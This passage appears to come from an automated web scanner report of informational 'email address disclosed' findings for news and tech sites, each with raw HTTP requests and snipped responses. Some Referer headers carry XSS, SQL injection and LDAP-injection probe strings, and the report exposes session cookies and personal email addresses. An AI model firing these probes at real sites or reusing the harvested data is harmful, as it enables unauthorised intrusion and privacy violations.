Expires: Sun, 06 Feb 2011 01:17:56 GMT
Date: Sun, 30 Jan 2011 01:17:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:52:54*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.135. http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:54:17 GMT
ETag: "28396b7-35a2-49af275dca440"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=530390
Expires: Sat, 05 Feb 2011 16:14:15 GMT
Date: Sun, 30 Jan 2011 12:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:54:17*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.136. http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:51:46 GMT
ETag: "16e4a27-63e0-49af26cdc9080"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=479269
Expires: Sat, 05 Feb 2011 01:55:22 GMT
Date: Sun, 30 Jan 2011 12:47:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25568

/*v23247: 2011-01-28T17:51:46*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.137. http://www.polls.newsvine.com/_vine/js/m1/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/m1/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_vine/js/m1/common.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://polls.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 22 Oct 2010 16:50:28 GMT
ETag: "22b0005-8577-493377092dd00"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=470797
Expires: Sat, 05 Feb 2011 01:54:30 GMT
Date: Sun, 30 Jan 2011 15:07:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 34167

// GET ELEMENT BY ID
function getElement(id) {
   return document.getElementById(id);
}

// ADD STARTSWITH TO STRING METHODS
String.prototype.startsWith = function(sStart) {
return (this.substr(0,sS
...[SNIP]...
rect.replace('error=', '').trim();
               alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "E4096".\n\nThank you.');
               unsetCommentButtons();
           } else if(!redirect && vinem1.modules.content.comments.commentForm.retries >= 1) {
               alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "Ragamuffin".\n\nThank you.');
               vinem1.modules.content.comments.commentForm.retries = 0;
               unsetCommentButtons();
               var debug = 'subj='+encodeURIC
...[SNIP]...
on.href = redirect;
           }
       } else {
           alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "Spiceweasel".\n\nThank you.');
           vinem1.modules.content.comments.commentForm.retries = 0;
           unsetCommentButtons();
           
           var debug = 'subj='+encodeURI
...[SNIP]...

26.138. http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/msnbc/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_vine/js/msnbc/s_code.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 16 Nov 2010 18:36:50 GMT
ETag: "2200003-448e-4952fd700d480"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=520391
Expires: Sat, 05 Feb 2011 01:52:50 GMT
Date: Sun, 30 Jan 2011 01:19:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17550

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.139. http://www.polls.newsvine.com/education

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /education

Issue detail

The following email address was disclosed in the response:

Request

GET /education HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=297
Date: Sun, 30 Jan 2011 19:09:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<p>Cornell - Complexity
Requires password
Unpacking the Nano Exhibit at Cornell; museum@cornell.edu
Kent Kleinman 607 255 6464</p>
...[SNIP]...

26.140. http://www.polls.newsvine.com/world-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /world-news

Issue detail

The following email address was disclosed in the response:

Request

GET /world-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<span>joshs7778@gmail.com:</span>
...[SNIP]...

26.141. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
with JavaScript 1.0.
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)
Author: Patrick Corcoran
Author Email: patrick@taylor.org
*/

var search_phrase;
var qsParm = new Array();

function parseURLParams(href) {
FORM_DATA = new Object();

...[SNIP]...

26.142. http://www.popsci.com/files/js/ee31ad0468d1381137041de39ea20f10.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /files/js/ee31ad0468d1381137041de39ea20f10.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /files/js/ee31ad0468d1381137041de39ea20f10.js HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 15:42:59 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4d D=9067
Content-Type: application/javascript
Content-Language: en
cache-control: max-age = 3600
Date: Sun, 30 Jan 2011 17:16:00 GMT
X-Varnish: 2068982210 2068965888
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache11: HIT 73
Content-Length: 118517

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-12-0
...[SNIP]...
ion of
* emptying all containers that are used to load content into.
* @type undefined
*
* @name $.ajaxHistory.initialize()
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.ajaxHistory = new function() {

var RESET_EVENT = 'historyReset';

var _currentHash = location.hash;
var _states = {};
var _intervalId = null;
var _observeHistory; // define
...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Implement Ajax driven links in a completely unobtrusive and accessible manner (also known as "Hijax")
* with support for the browser's back/forward navigation buttons and bookmarking.
*

...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.remote = function(output, settings, callback) {

callback = callback || function() {};
if (typeof settings == 'function') { // shift arguments
callback = settings;
}


...[SNIP]...
current value matches the href attribute of the matched element.
*
* @type jQuery
*
* @name history
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.history = function(callback) {
return this.click(function(e) {
// add to history only if true click occured, not a triggered click
if (e.clientX) {
$.a
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
   if (typeof value != 'undefined') { // name and value given, set cookie
       options = options || {};
       if (value === null) {
           value = '';
           option
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

26.143. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
<a href="http://www.scientificamerican.com/subscribe/subscribe_mainnav.cfm">Shop@ScientificAmerican.com</a-->
...[SNIP]...
<a href="mailto:blog@sciam.com">blog@sciam.com</a>
...[SNIP]...

26.144. http://www.scientificamerican.com/errors/404.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /errors/404.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
<a href="http://www.scientificamerican.com/subscribe/subscribe_mainnav.cfm">Shop@ScientificAmerican.com</a-->
...[SNIP]...

26.145. http://www.scout.com/3/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/privacy-policy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...

26.146. http://www.scout.com/3/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/terms-of-service.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53554

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com&subject=Terms of Use Agreement">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...
<b>mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout.DMCA@fox.com&subject=Scout.com DMCA">Scout.DMCA@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout.DMCA@fox.com">Scout.DMCA@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...
<a href="mailto:Feedback.Scout@fox.com">Feedback.Scout@fox.com</a>
...[SNIP]...

26.147. http://www.signonsandiego.com/news/blogs/science-quest/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.signonsandiego.com
Path:   /news/blogs/science-quest/

Issue detail

The following email address was disclosed in the response:

Request

GET /news/blogs/science-quest/ HTTP/1.1
Host: www.signonsandiego.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:20:02 GMT
ETag: "9c8550eb7d3bb13cfe45503c097b5a84"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:19:02 GMT
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.10
Content-Length: 111080
Date: Sun, 30 Jan 2011 03:19:02 GMT
X-Varnish: 1618713280
Age: 0
Via: 1.1 varnish
Connection: close

<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<meta name="verify-v1" content="6ylWgY9aqB0mJpcLJKDC73
...[SNIP]...
<a href="mailto:gary.robbins@uniontrib.com">gary.robbins@uniontrib.com</a>
...[SNIP]...

26.148. http://www.silverlight.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1ev523nooswmg2mlyukyfwa0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:30 GMT
Content-Length: 43355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Home : The
...[SNIP]...
<a href="http://forums.silverlight.net/members/bud_4000_dotnetchecks.com.aspx" title="bud@dotnetchecks.com" class="online">
...[SNIP]...
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319865000000000&cdn_id=12152010" alt="bud@dotnetchecks.com" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/bud@dotnetchecks.com.jpg?forceidenticon=False&dt=634319865000000000&cdn_id=12152010');" />
...[SNIP]...

26.149. http://www.silverlight.net/community/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76783
Content-Type: text/html; charset=utf-8
ETag: ""
